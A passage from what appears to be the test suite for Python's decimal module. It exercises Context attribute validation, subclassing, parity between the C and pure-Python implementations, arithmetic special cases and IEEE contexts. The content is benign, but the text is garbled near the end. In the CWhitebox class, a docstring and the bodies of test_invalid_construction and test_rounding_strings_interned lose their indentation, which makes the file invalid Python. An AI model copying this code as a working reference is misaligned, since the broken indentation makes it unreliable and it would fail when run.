        for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
                     'flags', 'traps']:
            self.assertRaises(AttributeError, c.__delattr__, attr)
        # Invalid attributes
        self.assertRaises(TypeError, getattr, c, 9)
        self.assertRaises(TypeError, setattr, c, 9)
        # Invalid values in constructor
        self.assertRaises(TypeError, Context, rounding=999999)
        self.assertRaises(TypeError, Context, rounding='xyz')
        self.assertRaises(ValueError, Context, clamp=2)
        self.assertRaises(ValueError, Context, capitals=-1)
        self.assertRaises(KeyError, Context, flags=["P"])
        self.assertRaises(KeyError, Context, traps=["Q"])
        # Type error in conversion
        self.assertRaises(TypeError, Context, flags=(0,1))
        self.assertRaises(TypeError, Context, traps=(1,0))
# Run the ContextInputValidation tests against the C implementation.
class CContextInputValidation(ContextInputValidation):
    decimal = C
# Run the ContextInputValidation tests against the pure-Python implementation.
class PyContextInputValidation(ContextInputValidation):
    decimal = P
class ContextSubclassing(unittest.TestCase):
    def test_context_subclassing(self):
        """A Context subclass with an overriding __init__ must interoperate
        with the implementation's attribute validation and arithmetic."""
        decimal = self.decimal
        Decimal = decimal.Decimal
        Context = decimal.Context
        Clamped = decimal.Clamped
        DivisionByZero = decimal.DivisionByZero
        Inexact = decimal.Inexact
        Overflow = decimal.Overflow
        Rounded = decimal.Rounded
        Subnormal = decimal.Subnormal
        Underflow = decimal.Underflow
        InvalidOperation = decimal.InvalidOperation
        class MyContext(Context):
            # Only assigns the attributes that were explicitly given,
            # so attribute validation fires on assignment.
            def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
                         capitals=None, clamp=None, flags=None,
                         traps=None):
                Context.__init__(self)
                if prec is not None:
                    self.prec = prec
                if rounding is not None:
                    self.rounding = rounding
                if Emin is not None:
                    self.Emin = Emin
                if Emax is not None:
                    self.Emax = Emax
                if capitals is not None:
                    self.capitals = capitals
                if clamp is not None:
                    self.clamp = clamp
                if flags is not None:
                    # A list of signals is converted to a full signal dict.
                    if isinstance(flags, list):
                        flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
                    self.flags = flags
                if traps is not None:
                    if isinstance(traps, list):
                        traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
                    self.traps = traps
        # Default-constructed subclass matches a default Context.
        c = Context()
        d = MyContext()
        for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
                     'flags', 'traps'):
            self.assertEqual(getattr(c, attr), getattr(d, attr))
        # prec
        self.assertRaises(ValueError, MyContext, **{'prec':-1})
        c = MyContext(prec=1)
        self.assertEqual(c.prec, 1)
        self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
        # rounding
        self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
        c = MyContext(rounding=ROUND_DOWN, prec=1)
        self.assertEqual(c.rounding, ROUND_DOWN)
        self.assertEqual(c.plus(Decimal('9.9')), 9)
        # Emin
        self.assertRaises(ValueError, MyContext, **{'Emin':5})
        c = MyContext(Emin=-1, prec=1)
        self.assertEqual(c.Emin, -1)
        x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
        self.assertEqual(x, Decimal('0.0'))
        for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
            self.assertTrue(c.flags[signal])
        # Emax
        self.assertRaises(ValueError, MyContext, **{'Emax':-1})
        c = MyContext(Emax=1, prec=1)
        self.assertEqual(c.Emax, 1)
        self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
        if self.decimal == C:
            for signal in (Inexact, Overflow, Rounded):
                self.assertTrue(c.flags[signal])
        # capitals
        self.assertRaises(ValueError, MyContext, **{'capitals':-1})
        c = MyContext(capitals=0)
        self.assertEqual(c.capitals, 0)
        x = c.create_decimal('1E222')
        self.assertEqual(c.to_sci_string(x), '1e+222')
        # clamp
        self.assertRaises(ValueError, MyContext, **{'clamp':2})
        c = MyContext(clamp=1, Emax=99)
        self.assertEqual(c.clamp, 1)
        x = c.plus(Decimal('1e99'))
        self.assertEqual(str(x), '1.000000000000000000000000000E+99')
        # flags
        self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
        c = MyContext(flags=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.flags[signal])
        c.clear_flags()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.flags[signal])
        # traps
        self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
        c = MyContext(traps=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.traps[signal])
        c.clear_traps()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.traps[signal])
# Run the ContextSubclassing tests against the C implementation.
class CContextSubclassing(ContextSubclassing):
    decimal = C
# Run the ContextSubclassing tests against the pure-Python implementation.
class PyContextSubclassing(ContextSubclassing):
    decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
    """Verify that the C and Python implementations expose the same API."""

    def test_module_attributes(self):
        """Module-level limits and metadata must agree between C and P."""
        # Architecture dependent context limits
        self.assertEqual(C.MAX_PREC, P.MAX_PREC)
        self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
        self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
        self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
        self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
        self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
        self.assertEqual(C.__version__, P.__version__)
        self.assertEqual(dir(C), dir(P))

    def test_context_attributes(self):
        """Every public Context attribute of C must also exist in P."""
        x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())

    def test_decimal_attributes(self):
        """Every public Decimal attribute of C must also exist in P.

        BUG FIX: 'y' previously listed dir(C.Decimal(9)) as well, so the
        test compared the C implementation against itself and could never
        detect a missing attribute in the Python implementation.
        """
        x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
    # Coverage-oriented tests run against both implementations; subclasses
    # set the class attribute 'decimal' to C or P.
    def test_adjusted(self):
        """adjusted() returns the adjusted exponent; 0 for NaN/inf."""
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
        # XXX raise?
        self.assertEqual(Decimal('nan').adjusted(), 0)
        self.assertEqual(Decimal('inf').adjusted(), 0)
    def test_canonical(self):
        """canonical() is the identity for already-canonical values."""
        Decimal = self.decimal.Decimal
        getcontext = self.decimal.getcontext
        x = Decimal(9).canonical()
        self.assertEqual(x, 9)
        c = getcontext()
        x = c.canonical(Decimal(9))
        self.assertEqual(x, 9)
    def test_context_repr(self):
        """repr() of a context with all signals cleared."""
        c = self.decimal.DefaultContext.copy()
        c.prec = 425000000
        c.Emax = 425000000
        c.Emin = -425000000
        c.rounding = ROUND_HALF_DOWN
        c.capitals = 0
        c.clamp = 1
        for sig in OrderedSignals[self.decimal]:
            c.flags[sig] = False
            c.traps[sig] = False
        s = c.__repr__()
        t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
            "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
            "flags=[], traps=[])"
        self.assertEqual(s, t)
    def test_implicit_context(self):
        """Operations without an explicit context use the thread context."""
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        with localcontext() as c:
            c.prec = 1
            c.Emax = 1
            c.Emin = -1
            # abs
            self.assertEqual(abs(Decimal("-10")), 10)
            # add
            self.assertEqual(Decimal("7") + 1, 8)
            # divide
            self.assertEqual(Decimal("10") / 5, 2)
            # divide_int
            self.assertEqual(Decimal("10") // 7, 1)
            # fma
            self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
            self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
            # three arg power
            self.assertEqual(pow(Decimal(10), 2, 7), 2)
            # exp
            self.assertEqual(Decimal("1.01").exp(), 3)
            # is_normal
            self.assertIs(Decimal("0.01").is_normal(), False)
            # is_subnormal
            self.assertIs(Decimal("0.01").is_subnormal(), True)
            # ln
            self.assertEqual(Decimal("20").ln(), 3)
            # log10
            self.assertEqual(Decimal("20").log10(), 1)
            # logb
            self.assertEqual(Decimal("580").logb(), 2)
            # logical_invert
            self.assertEqual(Decimal("10").logical_invert(), 1)
            # minus
            self.assertEqual(-Decimal("-10"), 10)
            # multiply
            self.assertEqual(Decimal("2") * 4, 8)
            # next_minus
            self.assertEqual(Decimal("10").next_minus(), 9)
            # next_plus
            self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
            # normalize
            self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
            # number_class
            self.assertEqual(Decimal("10").number_class(), '+Normal')
            # plus
            self.assertEqual(+Decimal("-1"), -1)
            # remainder
            self.assertEqual(Decimal("10") % 7, 3)
            # subtract
            self.assertEqual(Decimal("10") - 7, 3)
            # to_integral_exact
            self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
            # Boolean functions
            self.assertTrue(Decimal("1").is_canonical())
            self.assertTrue(Decimal("1").is_finite())
            self.assertTrue(Decimal("1").is_finite())
            self.assertTrue(Decimal("snan").is_snan())
            self.assertTrue(Decimal("-1").is_signed())
            self.assertTrue(Decimal("0").is_zero())
            self.assertTrue(Decimal("0").is_zero())
        # Copy
        with localcontext() as c:
            c.prec = 10000
            x = 1228 ** 1523
            y = -Decimal(x)
            z = y.copy_abs()
            self.assertEqual(z, x)
            z = y.copy_negate()
            self.assertEqual(z, x)
            z = y.copy_sign(Decimal(1))
            self.assertEqual(z, x)
    def test_divmod(self):
        """divmod() special cases: NaN, infinity, and division by zero."""
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        with localcontext() as c:
            q, r = divmod(Decimal("10912837129"), 1001)
            self.assertEqual(q, Decimal('10901935'))
            self.assertEqual(r, Decimal('194'))
            q, r = divmod(Decimal("NaN"), 7)
            self.assertTrue(q.is_nan() and r.is_nan())
            c.traps[InvalidOperation] = False
            q, r = divmod(Decimal("NaN"), 7)
            self.assertTrue(q.is_nan() and r.is_nan())
            c.traps[InvalidOperation] = False
            c.clear_flags()
            q, r = divmod(Decimal("inf"), Decimal("inf"))
            self.assertTrue(q.is_nan() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])
            c.clear_flags()
            q, r = divmod(Decimal("inf"), 101)
            self.assertTrue(q.is_infinite() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])
            c.clear_flags()
            q, r = divmod(Decimal(0), 0)
            self.assertTrue(q.is_nan() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])
            c.traps[DivisionByZero] = False
            c.clear_flags()
            q, r = divmod(Decimal(11), 0)
            self.assertTrue(q.is_infinite() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation] and
                            c.flags[DivisionByZero])
    def test_power(self):
        """Power operator: Rounded flag and Overflow to infinity."""
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        Overflow = self.decimal.Overflow
        Rounded = self.decimal.Rounded
        with localcontext() as c:
            c.prec = 3
            c.clear_flags()
            self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
            self.assertTrue(c.flags[Rounded])
            c.prec = 1
            c.Emax = 1
            c.Emin = -1
            c.clear_flags()
            c.traps[Overflow] = False
            self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
            self.assertTrue(c.flags[Overflow])
    def test_quantize(self):
        """quantize() returns NaN when the result would exceed prec and
        InvalidOperation is not trapped."""
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        with localcontext() as c:
            c.prec = 1
            c.Emax = 1
            c.Emin = -1
            c.traps[InvalidOperation] = False
            x = Decimal(99).quantize(Decimal("1e1"))
            self.assertTrue(x.is_nan())
    def test_radix(self):
        """radix() is always 10."""
        Decimal = self.decimal.Decimal
        getcontext = self.decimal.getcontext
        c = getcontext()
        self.assertEqual(Decimal("1").radix(), 10)
        self.assertEqual(c.radix(), 10)
    def test_rop(self):
        """Reflected operators return NotImplemented for foreign types."""
        Decimal = self.decimal.Decimal
        for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
                     '__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
            self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
    def test_round(self):
        # Python3 behavior: round() returns Decimal
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        with localcontext() as c:
            c.prec = 28
            self.assertEqual(str(Decimal("9.99").__round__()), "10")
            self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
            self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
            self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
            self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
            self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
            self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
    def test_create_decimal(self):
        """create_decimal() rejects non-string sequence input."""
        c = self.decimal.Context()
        self.assertRaises(ValueError, c.create_decimal, ["%"])
    def test_int(self):
        """int() truncates, to_integral() rounds."""
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        with localcontext() as c:
            c.prec = 9999
            x = Decimal(1221**1271) / 10**3923
            self.assertEqual(int(x), 1)
            self.assertEqual(x.to_integral(), 2)
    def test_copy(self):
        """Context copy_abs/copy_negate/copy_sign on a large negative int."""
        Context = self.decimal.Context
        c = Context()
        c.prec = 10000
        x = -(1172 ** 1712)
        y = c.copy_abs(x)
        self.assertEqual(y, -x)
        y = c.copy_negate(x)
        self.assertEqual(y, -x)
        y = c.copy_sign(x, 1)
        self.assertEqual(y, -x)
# Run the Coverage tests against the C implementation.
class CCoverage(Coverage):
    decimal = C
# Run the Coverage tests against the pure-Python implementation.
class PyCoverage(Coverage):
    decimal = P
class PyFunctionality(unittest.TestCase):
    """Extra functionality in decimal.py"""
    def test_py_alternate_formatting(self):
        """Alternate ('#') form formatting, specific to decimal.py.

        Each triple gives a format spec, a Decimal literal and the
        expected formatted result (issue 7094).
        """
        # triples giving a format, a Decimal, and the expected result
        Decimal = P.Decimal
        # (removed an unused local binding of P.localcontext)
        test_values = [
            # Issue 7094: Alternate formatting (specified by #)
            ('.0e', '1.0', '1e+0'),
            ('#.0e', '1.0', '1.e+0'),
            ('.0f', '1.0', '1'),
            ('#.0f', '1.0', '1.'),
            ('g', '1.1', '1.1'),
            ('#g', '1.1', '1.1'),
            ('.0g', '1', '1'),
            ('#.0g', '1', '1.'),
            ('.0%', '1.0', '100%'),
            ('#.0%', '1.0', '100.%'),
        ]
        for fmt, d, result in test_values:
            self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
    """White box testing for decimal.py"""
    def test_py_exact_power(self):
        # Rarely exercised lines in _power_exact.
        Decimal = P.Decimal
        localcontext = P.localcontext
        with localcontext() as c:
            c.prec = 8
            x = Decimal(2**16) ** Decimal("-0.5")
            self.assertEqual(x, Decimal('0.00390625'))
            x = Decimal(2**16) ** Decimal("-0.6")
            self.assertEqual(x, Decimal('0.0012885819'))
            x = Decimal("256e7") ** Decimal("-0.5")
            x = Decimal(152587890625) ** Decimal('-0.0625')
            self.assertEqual(x, Decimal("0.2"))
            x = Decimal("152587890625e7") ** Decimal('-0.0625')
            x = Decimal(5**2659) ** Decimal('-0.0625')
            c.prec = 1
            x = Decimal("152587890625") ** Decimal('-0.5')
            c.prec = 201
            x = Decimal(2**578) ** Decimal("-0.5")
    def test_py_immutability_operations(self):
        # Do operations and check that it didn't change internal objects.
        Decimal = P.Decimal
        DefaultContext = P.DefaultContext
        setcontext = P.setcontext
        c = DefaultContext.copy()
        c.traps = dict((s, 0) for s in OrderedSignals[P])
        setcontext(c)
        d1 = Decimal('-25e55')
        b1 = Decimal('-25e55')
        d2 = Decimal('33e+33')
        b2 = Decimal('33e+33')
        def checkSameDec(operation, useOther=False):
            # Run the named operation via eval and verify the operands'
            # internal fields (_sign, _int, _exp) are unchanged.
            if useOther:
                eval("d1." + operation + "(d2)")
                self.assertEqual(d1._sign, b1._sign)
                self.assertEqual(d1._int, b1._int)
                self.assertEqual(d1._exp, b1._exp)
                self.assertEqual(d2._sign, b2._sign)
                self.assertEqual(d2._int, b2._int)
                self.assertEqual(d2._exp, b2._exp)
            else:
                eval("d1." + operation + "()")
                self.assertEqual(d1._sign, b1._sign)
                self.assertEqual(d1._int, b1._int)
                self.assertEqual(d1._exp, b1._exp)
        Decimal(d1)
        self.assertEqual(d1._sign, b1._sign)
        self.assertEqual(d1._int, b1._int)
        self.assertEqual(d1._exp, b1._exp)
        checkSameDec("__abs__")
        checkSameDec("__add__", True)
        checkSameDec("__divmod__", True)
        checkSameDec("__eq__", True)
        checkSameDec("__ne__", True)
        checkSameDec("__le__", True)
        checkSameDec("__lt__", True)
        checkSameDec("__ge__", True)
        checkSameDec("__gt__", True)
        checkSameDec("__float__")
        checkSameDec("__floordiv__", True)
        checkSameDec("__hash__")
        checkSameDec("__int__")
        checkSameDec("__trunc__")
        checkSameDec("__mod__", True)
        checkSameDec("__mul__", True)
        checkSameDec("__neg__")
        checkSameDec("__bool__")
        checkSameDec("__pos__")
        checkSameDec("__pow__", True)
        checkSameDec("__radd__", True)
        checkSameDec("__rdivmod__", True)
        checkSameDec("__repr__")
        checkSameDec("__rfloordiv__", True)
        checkSameDec("__rmod__", True)
        checkSameDec("__rmul__", True)
        checkSameDec("__rpow__", True)
        checkSameDec("__rsub__", True)
        checkSameDec("__str__")
        checkSameDec("__sub__", True)
        checkSameDec("__truediv__", True)
        checkSameDec("adjusted")
        checkSameDec("as_tuple")
        checkSameDec("compare", True)
        checkSameDec("max", True)
        checkSameDec("min", True)
        checkSameDec("normalize")
        checkSameDec("quantize", True)
        checkSameDec("remainder_near", True)
        checkSameDec("same_quantum", True)
        checkSameDec("sqrt")
        checkSameDec("to_eng_string")
        checkSameDec("to_integral")
    def test_py_decimal_id(self):
        # Decimal(Decimal) makes a new object in the Python implementation.
        Decimal = P.Decimal
        d = Decimal(45)
        e = Decimal(d)
        self.assertEqual(str(e), '45')
        self.assertNotEqual(id(d), id(e))
    def test_py_rescale(self):
        # Coverage
        Decimal = P.Decimal
        localcontext = P.localcontext
        with localcontext() as c:
            x = Decimal("NaN")._rescale(3, ROUND_UP)
            self.assertTrue(x.is_nan())
    def test_py__round(self):
        # Coverage
        Decimal = P.Decimal
        self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
    """Extra functionality in _decimal"""
    @requires_extra_functionality
    def test_c_ieee_context(self):
        # issue 8786: Add support for IEEE 754 contexts to decimal module.
        IEEEContext = C.IEEEContext
        DECIMAL32 = C.DECIMAL32
        DECIMAL64 = C.DECIMAL64
        DECIMAL128 = C.DECIMAL128
        def assert_rest(self, context):
            # Common checks for every IEEE context: clamp=1, no traps,
            # no flags set.
            self.assertEqual(context.clamp, 1)
            assert_signals(self, context, 'traps', [])
            assert_signals(self, context, 'flags', [])
        c = IEEEContext(DECIMAL32)
        self.assertEqual(c.prec, 7)
        self.assertEqual(c.Emax, 96)
        self.assertEqual(c.Emin, -95)
        assert_rest(self, c)
        c = IEEEContext(DECIMAL64)
        self.assertEqual(c.prec, 16)
        self.assertEqual(c.Emax, 384)
        self.assertEqual(c.Emin, -383)
        assert_rest(self, c)
        c = IEEEContext(DECIMAL128)
        self.assertEqual(c.prec, 34)
        self.assertEqual(c.Emax, 6144)
        self.assertEqual(c.Emin, -6143)
        assert_rest(self, c)
        # Invalid values
        self.assertRaises(OverflowError, IEEEContext, 2**63)
        self.assertRaises(ValueError, IEEEContext, -1)
        self.assertRaises(ValueError, IEEEContext, 1024)
    @requires_extra_functionality
    def test_c_context(self):
        """Context accepts raw condition-flag integers for flags/traps."""
        Context = C.Context
        c = Context(flags=C.DecClamped, traps=C.DecRounded)
        self.assertEqual(c._flags, C.DecClamped)
        self.assertEqual(c._traps, C.DecRounded)
    @requires_extra_functionality
    def test_constants(self):
        """The module-level condition-flag constants form a bit field."""
        # Condition flags
        cond = (
            C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
            C.DecDivisionImpossible, C.DecDivisionUndefined,
            C.DecFpuError, C.DecInexact, C.DecInvalidContext,
            C.DecInvalidOperation, C.DecMallocError,
            C.DecFloatOperation, C.DecOverflow, C.DecRounded,
            C.DecSubnormal, C.DecUnderflow
        )
        # IEEEContext
        self.assertEqual(C.DECIMAL32, 32)
        self.assertEqual(C.DECIMAL64, 64)
        self.assertEqual(C.DECIMAL128, 128)
        self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
        # Conditions: each constant is a distinct power of two.
        for i, v in enumerate(cond):
            self.assertEqual(v, 1<<i)
        self.assertEqual(C.DecIEEEInvalidOperation,
                         C.DecConversionSyntax|
                         C.DecDivisionImpossible|
                         C.DecDivisionUndefined|
                         C.DecFpuError|
                         C.DecInvalidContext|
                         C.DecInvalidOperation|
                         C.DecMallocError)
        self.assertEqual(C.DecErrors,
                         C.DecIEEEInvalidOperation|
                         C.DecDivisionByZero)
        self.assertEqual(C.DecTraps,
                         C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
    def test_bignum(self):
        # Not exactly whitebox, but too slow with pydecimal.
        # Cross-check Decimal exponentiation against Python int pow
        # for a few random large operands at high precision.
        Decimal = C.Decimal
        localcontext = C.localcontext
        b1 = 10**35
        b2 = 10**36
        with localcontext() as c:
            c.prec = 1000000
            for i in range(5):
                a = random.randrange(b1, b2)
                b = random.randrange(1000, 1200)
                x = a ** b
                y = Decimal(a) ** Decimal(b)
                self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
    def test_c_input_restriction(self):
        # Too large for _decimal to be converted exactly
        # (the exponent exceeds the C implementation's limits).
        Decimal = C.Decimal
        InvalidOperation = C.InvalidOperation
        Context = C.Context
        localcontext = C.localcontext
        with localcontext(Context()):
            self.assertRaises(InvalidOperation, Decimal,
                              "1e9999999999999999999")
    def test_c_context_repr(self):
        # This test is _decimal-only because flags are not printed
        # in the same order.
        DefaultContext = C.DefaultContext
        FloatOperation = C.FloatOperation
        c = DefaultContext.copy()
        c.prec = 425000000
        c.Emax = 425000000
        c.Emin = -425000000
        c.rounding = ROUND_HALF_DOWN
        c.capitals = 0
        c.clamp = 1
        # Set every signal so repr() lists them all.
        for sig in OrderedSignals[C]:
            c.flags[sig] = True
            c.traps[sig] = True
        c.flags[FloatOperation] = True
        c.traps[FloatOperation] = True
        s = c.__repr__()
        t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
            "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
            "flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
                   "FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
            "traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
                   "FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
        self.assertEqual(s, t)
    def test_c_context_errors(self):
        """Input validation specific to _decimal's Context and SignalDict."""
        Context = C.Context
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        FloatOperation = C.FloatOperation
        localcontext = C.localcontext
        getcontext = C.getcontext
        setcontext = C.setcontext
        # 64-bit configuration allows a larger MAX_PREC.
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
        c = Context()
        # SignalDict: input validation
        self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
        self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
        self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
        self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
        self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
        self.assertRaises(TypeError, setattr, c,'traps', ['y'])
        self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
        self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
        # Test assignment from a signal dict with the correct length but
        # one invalid key.
        d = c.flags.copy()
        del d[FloatOperation]
        d["XYZ"] = 91283719
        self.assertRaises(KeyError, setattr, c, 'flags', d)
        self.assertRaises(KeyError, setattr, c, 'traps', d)
        # Input corner cases
        int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
        gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
        # prec, Emax, Emin
        for attr in ['prec', 'Emax']:
            self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
        self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
        # prec, Emax, Emin in context constructor
        self.assertRaises(ValueError, Context, prec=gt_max_emax)
        self.assertRaises(ValueError, Context, Emax=gt_max_emax)
        self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
        # Overflow in conversion
        self.assertRaises(OverflowError, Context, prec=int_max+1)
        self.assertRaises(OverflowError, Context, Emax=int_max+1)
        self.assertRaises(OverflowError, Context, Emin=-int_max-2)
        self.assertRaises(OverflowError, Context, clamp=int_max+1)
        self.assertRaises(OverflowError, Context, capitals=int_max+1)
        # OverflowError, general ValueError
        for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
            self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
            self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
            if sys.platform != 'win32':
                self.assertRaises(ValueError, setattr, c, attr, int_max)
                self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
        # OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
        if C.MAX_PREC == 425000000:
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
                              int_max+1)
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
                              int_max+1)
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
                              -int_max-2)
        # ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
        if C.MAX_PREC == 425000000:
            self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
                              1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
                              1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
                              -1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
        # capitals, clamp
        for attr in ['capitals', 'clamp']:
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(ValueError, setattr, c, attr, 2)
            self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
            if HAVE_CONFIG_64:
                self.assertRaises(ValueError, setattr, c, attr, 2**32)
                self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
        # Invalid local context
        self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
                          locals())
        self.assertRaises(TypeError, exec,
                          'with localcontext(context=getcontext()): pass',
                          locals())
        # setcontext
        saved_context = getcontext()
        self.assertRaises(TypeError, setcontext, "xyz")
        setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
    @requires_extra_functionality
    def test_c_context_errors_extra(self):
        """Input validation for the extra _allcr/_flags/_traps attributes."""
        Context = C.Context
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        localcontext = C.localcontext
        getcontext = C.getcontext
        setcontext = C.setcontext
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
        c = Context()
        # Input corner cases
        int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
        # OverflowError, general ValueError
        self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
        self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
        if sys.platform != 'win32':
            self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
            self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
        # OverflowError, general TypeError
        for attr in ('_flags', '_traps'):
            self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
            self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
            if sys.platform != 'win32':
                self.assertRaises(TypeError, setattr, c, attr, int_max)
                self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
        # _allcr
        self.assertRaises(ValueError, setattr, c, '_allcr', -1)
        self.assertRaises(ValueError, setattr, c, '_allcr', 2)
        self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
        if HAVE_CONFIG_64:
            self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
            self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
        # _flags, _traps
        for attr in ['_flags', '_traps']:
            self.assertRaises(TypeError, setattr, c, attr, 999999)
            self.assertRaises(TypeError, setattr, c, attr, 'x')
